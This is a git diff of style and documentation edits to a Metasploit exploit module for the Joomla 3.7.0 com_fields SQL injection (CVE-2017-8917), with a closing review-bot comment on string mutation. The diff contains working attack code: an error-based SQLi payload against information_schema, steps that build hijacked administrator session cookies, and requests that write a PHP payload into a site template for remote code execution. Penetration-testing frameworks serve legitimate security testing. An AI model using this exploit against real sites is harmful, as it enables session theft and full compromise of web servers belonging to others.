Changes suggested by h00die
parent
05a653b853
commit
048d0d1fe4
@ -1,7 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a sql injection in the core of Joomla 3.7.0.
|
||||
This vulnerability can allow remote code execution.
|
||||
This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
|
||||
With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
|
||||
|
||||
## Verification
|
||||
|
||||
|
@ -15,7 +15,7 @@
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Joomal 3.7.0 and an administrator must be authenticated in the backend
|
||||
### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
|
||||
|
||||
```
|
||||
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce
|
||||
|
|
|
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Component Fields SQLi Remote Code Execution",
|
||||
'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability found in Joomla versions
|
||||
3.7.0.
|
||||
|
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-8917' ], # SQLi
|
||||
['EDB', '42033'],
|
||||
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
|
||||
],
|
||||
'Payload' =>
|
||||
|
@ -41,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'Joomla 3.7.0', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 17 2017",
|
||||
'DisclosureDate' => 'May 17 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def sqli( tableprefix , option)
|
||||
|
||||
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
|
||||
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
|
||||
# The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
|
||||
# This way we make sure that's excluded and we only get real admin sessions.
|
||||
|
||||
if option == 'check'
|
||||
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
|
||||
else
|
||||
|
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Modify cookie to authenticated admin
|
||||
auth_cookie = cookie_begin
|
||||
auth_cookie << "="
|
||||
auth_cookie << '='
|
||||
auth_cookie << auth_cookie_part
|
||||
auth_cookie << ";"
|
||||
auth_cookie << ';'
|
||||
|
||||
# Authenticated session
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
|
@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Retrieve template view
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
|
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Creating file [ #(unknown).php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
|
|
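Review bot: `auth_cookie = cookie_begin` followed by `auth_cookie << '='` appends in place to the very same String object, so `cookie_begin` is mutated as a side effect of building the hijacked session cookie; if that variable is reused after this point (its origin is outside the hunk, so this is inferred), it will already carry the `=<part>;` suffix. The quote-style changes in this hunk leave that aliasing untouched. Building the value in one interpolated expression, `auth_cookie = "#{cookie_begin}=#{auth_cookie_part};"`, removes the four append lines and leaves `cookie_begin` intact. The enclosing method starts and ends outside the hunk.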